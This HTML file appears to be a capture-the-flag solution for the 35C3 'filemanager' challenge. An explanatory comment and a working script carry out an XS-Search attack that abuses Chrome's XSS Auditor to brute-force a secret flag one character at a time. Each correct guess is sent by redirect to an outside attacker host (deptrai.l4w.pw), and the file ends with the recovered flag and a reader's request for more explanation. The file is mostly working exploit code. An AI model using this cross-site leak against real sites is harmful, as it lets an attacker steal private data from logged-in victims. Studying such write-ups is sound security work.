go.html

<body>
<!--
Briefly, we all know that flag is stored as `file` in admin account. Plus, the flag is in the format: 35C3_***
When we searching content of a file, if it does exists, there is a script which doing highlight the found word by yellow <mark>

For example: https://filemanager.appspot.com/search?q=def

  <h1>abc</h1>
  <pre>def</pre>
  
  <script>
    (()=>{
      for (let pre of document.getElementsByTagName('pre')) {
        let text = pre.innerHTML;
        let q = 'def';
        let idx = text.indexOf(q);
        pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
      }
    })();
  </script>



Okay, now let's go to XSS Auditor part.

Try this on Chrome (yea we should, since the description saying that the admin is using Chrome-headless)
view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b

You can see the red alert, which means that XSS-Auditor found a XSS vector on our URL (`a` param) which also showing in the page's content. But in fact, it's *NOT XSS* , this is side effect of the auditor
We leverage on its mechanism to detect whether there is search result (guessing flag) or not.

* To clarify: `a` is just foo parameter name, we just wanna make XSS-Auditor see it's as XSS vector.

But how do we do that ? Since XSS-Auditor will detect and block the page, redirect the page to `chrome-error://chromewebdata/` as well.

Now the trick comes by. by reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning

I found out, it's possible to detect if the browser redirects to other page.

Yep, and that's all.

We can guess the flag by performing XS-Search leverage on XSS-Auditor 
-->
<script>
		var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
		var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';

		var brute = new URLSearchParams(location.search).get('brute') || '35C3_';

		function guess(i){
			var go = brute + charset[i];
			var x = document.createElement('iframe');
			x.name = 'blah';
			var calls = 0;
			x.onload = () => {
				calls++;
				if(calls > 1){ 
					// so here is calling 2nd onload which means the xss auditor blocking this and the page is redirected to chrome-error://
					// https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
					console.log("GO IT ==> ",go);
					location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go);
					x.onload = ()=>{};
				}
				var anchor = document.createElement('a');
				anchor.target = x.name;
				anchor.href = x.src+'#';
				anchor.click();
				anchor = null;
			}
			x.src = URL.replace('{{search}}',go);
			document.body.appendChild(x);
			setTimeout(() =>{
				document.body.removeChild(x);
				guess(i+1);
			},1000);
		}
		guess(0);
		// FLAG: 35C3_xss_auditor_for_the_win
</script>

</body>

Hic! Pro có thể nói rõ hơn đc không?? :)) Mong đc chỉ giáo :v